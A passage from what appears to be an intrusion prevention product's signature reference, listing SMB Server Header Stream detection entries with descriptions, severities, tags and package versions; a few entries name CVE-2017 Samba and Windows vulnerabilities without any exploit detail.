Tags: Any Operating System, Any Hardware, Samba, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-489-5211
Description:
Back to top

SMB-TCP_SHS-Negotiate-Protocol-Response-Success

About this situation: SMB successful negotiate protocol detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Samba, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-489-5211
Description:
Back to top

SMB-TCP_SHS-No-AndX-Command-Fail

About this situation: Unsuccessful Samba No AndX Command reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-No-AndX-Command-Success

About this situation: Successful Samba No AndX Command reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Nonstandard-Command-Failed-Reply

About this situation: Failure reply for unknown Samba command was detected
Context: SMB Server Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Nonstandard-Command-Success-Reply

About this situation: Success reply for unknown Samba command was detected
Context: SMB Server Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-NT-Cancel-Fail

About this situation: Unsuccessful Samba NT Cancel reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-NT-Cancel-Success

About this situation: Successful Samba NT Cancel reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-NT-Create-AndX-Fail

About this situation: Unsuccessful Samba NT Transact reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-NT-Create-AndX-Success

About this situation: Successful Samba NT Transact reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-NT-Rename-Fail

About this situation: Unsuccessful Samba NT Rename reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-NT-Rename-Success

About this situation: Successful Samba NT Rename reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-NT-Transact-Fail

About this situation: Unsuccessful Samba NT Transact reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-NT-Transact-Secondary-Fail

About this situation: Unsuccessful Samba NT Transact reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-NT-Transact-Secondary-Success

About this situation: Successful Samba NT Transact reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-NT-Transact-Success

About this situation: Successful Samba NT Transact reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-NTLM-Authentication-Usage

About this situation: Detects NTLM authentication usage
Context: SMB Server Header Stream
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Protocol Information
First detected in: sgpkg-ips-1007-5242
Last changed: sgpkg-ips-1007-5242
Vulnerability: Known-APT-Traffic
Description:
Back to top

SMB-TCP_SHS-Open-AndX-Fail

About this situation: Unsuccessful Samba Open AndX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Open-AndX-Success

About this situation: Successful Samba Open AndX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Open-Fail

About this situation: Unsuccessful Samba Open reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Open-Print-File-Fail

About this situation: Unsuccessful Samba Open Print File reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Open-Print-File-Success

About this situation: Successful Samba Open Print File reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Open-Success

About this situation: Successful Samba Open reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Process-Exit-Fail

About this situation: Unsuccessful Samba Process Exit reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Process-Exit-Success

About this situation: Successful Samba Process Exit reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Query-Information-Disk-Fail

About this situation: Unsuccessful Samba Query Information Disk reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Query-Information-Disk-Success

About this situation: Successful Samba Query Information Disk reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Query-Information-Fail

About this situation: Unsuccessful Samba Query Information reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Query-Information-Success

About this situation: Successful Samba Query Information reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Query-Information2-Fail

About this situation: Unsuccessful Samba Query Information2 reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Query-Information2-Success

About this situation: Successful Samba Query Information2 reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Query-Server-Fail

About this situation: Unsuccessful Samba Query Server reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Query-Server-Success

About this situation: Successful Samba Query Server reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Read-AndX-Fail

About this situation: Unsuccessful Samba Read AndX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Read-AndX-Success

About this situation: Successful Samba Read AndX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Read-Bulk-Fail

About this situation: Unsuccessful Samba Read Bulk reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Read-Bulk-Success

About this situation: Successful Samba Read Bulk reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Read-Fail

About this situation: Unsuccessful Samba Read reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Read-MPX-Fail

About this situation: Unsuccessful Samba Read MPX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Read-MPX-Secondary-Fail

About this situation: Unsuccessful Samba Read MPX Secondary reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Read-MPX-Secondary-Success

About this situation: Successful Samba Read MPX Secondary reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Read-MPX-Success

About this situation: Successful Samba Read MPX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Read-Raw-Fail

About this situation: Unsuccessful Samba Read Raw reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Read-Raw-Success

About this situation: Successful Samba Read Raw reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Read-Success

About this situation: Successful Samba Read reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Rename-Fail

About this situation: Unsuccessful Samba Rename reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Rename-Success

About this situation: Successful Samba Rename reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Samba-SMB1-Message_Push_String-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: SMB Server Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1082-5242
Vulnerability: Samba-SMB1-Message_Push_String-Information-Disclosure
Description:
Back to top

SMB-TCP_SHS-Search-Fail

About this situation: Unsuccessful Samba Search reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Search-Success

About this situation: Successful Samba Search reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Security-Package-AndX-Fail

About this situation: Unsuccessful Samba Security Package AndX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Security-Package-AndX-Success

About this situation: Successful Samba Security Package AndX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Seek-Fail

About this situation: Unsuccessful Samba Seek reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Seek-Success

About this situation: Successful Samba Seek reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Session-Setup-AndX-Fail

About this situation: Unsuccessful Samba Session Setup AndX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Session-Setup-AndX-Success

About this situation: Successful Samba Session Setup AndX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Set-Information-Fail

About this situation: Unsuccessful Samba Set Information reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Set-Information-Success

About this situation: Successful Samba Set Information reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Set-Information2-Fail

About this situation: Unsuccessful Samba Set Information2 reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Set-Information2-Success

About this situation: Successful Samba Set Information2 reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Cancel-Response

About this situation: SMB version 2 Cancel request was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Change-Notify-Response

About this situation: SMB version 2 Change Notify response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Close-Response

About this situation: SMB version 2 Close response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Create-Response

About this situation: SMB version 2 Create response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Echo-Response

About this situation: SMB version 2 Echo request was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Flush-Response

About this situation: SMB version 2 Flush response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-IOCTL-Response

About this situation: SMB version 2 IOCTL response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Lock-Response

About this situation: SMB version 2 Lock response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Logoff-Response

About this situation: SMB version 2 Logoff response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Negotiate-Response

About this situation: SMB version 2 Negotiate response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Oplock-Break-Response

About this situation: SMB version 2 Oplock Break response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Query-Directory-Response

About this situation: SMB version 2 Query Directory response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Query-Info-Response

About this situation: SMB version 2 Query Info request was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Read-Response

About this situation: SMB version 2 Read response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Session-Setup-Response

About this situation: SMB version 2 Session Setup response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Set-Info-Response

About this situation: SMB version 2 Set-Info response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Tree-Connect-Response

About this situation: SMB version 2 Tree Connect response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-1644-5242
Description:
Back to top

SMB-TCP_SHS-SMB2-Tree-Connect-Response-Too-Long

About this situation: Samba Write Bulk Data request was detected
Context: SMB Server Header Stream
Severity: 2
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-852-5242
Vulnerability: Microsoft-Windows-Vulnerability-CVE-2017-0016
Description:
Back to top

SMB-TCP_SHS-SMB2-Tree-Disconnect-Response

About this situation: SMB version 2 Tree Disconnect response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB2-Write-Response

About this situation: SMB version 2 Write response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Description:
Back to top

SMB-TCP_SHS-SMB3-Negotiate-Response

About this situation: SMB version 3 Negotiate response was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-1131-5242
Last changed: sgpkg-ips-1131-5242
Description:
Back to top

SMB-TCP_SHS-Transaction-Fail

About this situation: Unsuccessful Samba Transaction reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Transaction-Secondary-Fail

About this situation: Unsuccessful Samba Transaction reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Transaction-Secondary-Success

About this situation: Successful Samba Transaction reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Transaction-Success

About this situation: Successful Samba Transaction reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Transaction2-Fail

About this situation: Unsuccessful Samba Transaction2 reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Transaction2-Secondary-Fail

About this situation: Unsuccessful Samba Transaction2 Secondary reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

SMB-TCP_SHS-Transaction2-Secondary-Success

About this situation: Successful Samba Transaction2 Secondary reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-631-5211
Description:
Back to top

SMB-TCP_SHS-Transaction2-Success

About this situation: Successful Samba Transaction2 reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Tree-Connect-AndX-Fail

About this situation: Unsuccessful Samba Tree Connect AndX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Tree-Connect-AndX-Success

About this situation: Successful Samba Tree Connect AndX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Tree-Connect-Fail

About this situation: Unsuccessful Samba Tree Connect reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Tree-Connect-Success

About this situation: Successful Samba Tree Connect reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Tree-Disconnect-Fail

About this situation: Unsuccessful Samba Tree Disconnect reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Tree-Disconnect-Success

About this situation: Successful Samba Tree Disconnect reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Unlock-Byte-Range-Fail

About this situation: Unsuccessful Samba Unlock Byte Range reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Unlock-Byte-Range-Success

About this situation: Successful Samba Unlock Byte Range reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-And-Close-Fail

About this situation: Unsuccessful Samba Move reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Write-And-Close-Success

About this situation: Successful Samba Move reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
